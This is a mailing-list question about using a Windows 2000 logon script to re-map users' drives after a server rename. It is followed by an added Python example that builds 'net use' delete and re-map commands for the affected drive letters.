Does anyone know if it is possible to re-map existing drives through a log on script after changing a server name? This is the situation we have; We are 'upgrading', format, install fresh, and restore information, one of our servers from NT4 to 2000 and in the process we are renaming the server from APPS_SERVER to APPS2, to keep in line with Internet DNS naming standards. I know that there will be numerous people with mapped drives to this server such as Prog on 'Apps_Server' (P:). Is there a way through 2000 logon scripts or, 3rd party software, that upon logon the users drive mappings can be reviewed and through the use of variables accomplish something like this; if %drive_letter% = 'Apps_Server' then net delete 'Apps_Server' and Net Use 'Apps2', to whatever drive letter the directory was originally mapped. We need to use a variable for the drive letter because there are numerous shared directories that are mapped to numerous different Drive Letters, most done manually by department or individual developers. Thanks in advance for any help. Tom Grabowski
** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility **
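One way to do what the original question asks, as an added example that is not from any poster in this thread: read the user's existing mappings from `net use` output, keep each drive letter and share path, and emit the delete and re-map commands only for drives that point at the old server. It assumes the usual column layout of `net use` (Status, Local, Remote, Network, with the Remote and Network columns separated by at least two spaces); the function names and the sample listing are constructed, and the commands are returned for review rather than executed.

```python
import re

# One mapping row: optional status, drive letter, \\server\share path,
# then (optionally) the Network column after two or more spaces.
ROW_RE = re.compile(
    r"^(?P<status>\S*)[ \t]+(?P<local>[A-Za-z]:)[ \t]+"
    r"\\\\(?P<server>[^\\\s]+)\\(?P<path>.+?)(?:[ \t]{2,}\S.*)?$",
    re.M)


def plan_remap(net_use_output, old_server, new_server):
    """Return (drive, old UNC, new UNC) for every drive mapped to
    old_server. Drive letters and share paths are preserved; mappings to
    other servers are left out of the plan entirely."""
    plan = []
    for m in ROW_RE.finditer(net_use_output):
        if m.group("server").lower() != old_server.lower():
            continue
        path = m.group("path").rstrip()
        plan.append((m.group("local").upper(),
                     "\\\\%s\\%s" % (m.group("server"), path),
                     "\\\\%s\\%s" % (new_server, path)))
    return plan


def to_commands(plan):
    """Turn a plan into the net use commands a logon script would run."""
    commands = []
    for local, _old_unc, new_unc in plan:
        commands.append("net use %s /delete" % local)
        # Quote the UNC path so share names containing spaces survive.
        commands.append('net use %s "%s" /persistent:yes' % (local, new_unc))
    return commands


# Constructed sample of `net use` output for one user. P: and Q: point at
# the server being renamed in the thread; H: must not be touched.
SAMPLE_NET_USE = r"""New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           P:        \\APPS_SERVER\Prog        Microsoft Windows Network
Disconnected Q:        \\apps_server\Shared Docs  Microsoft Windows Network
OK           H:        \\FILESRV\Home            Microsoft Windows Network
The command completed successfully.
"""

if __name__ == "__main__":
    for command in to_commands(plan_remap(SAMPLE_NET_USE, "APPS_SERVER", "APPS2")):
        print(command)
```

Printing the plan first shows exactly which letters would change on a given workstation before anything is deleted, which avoids the blanket `net use * /delete` the poster wants to stay away from.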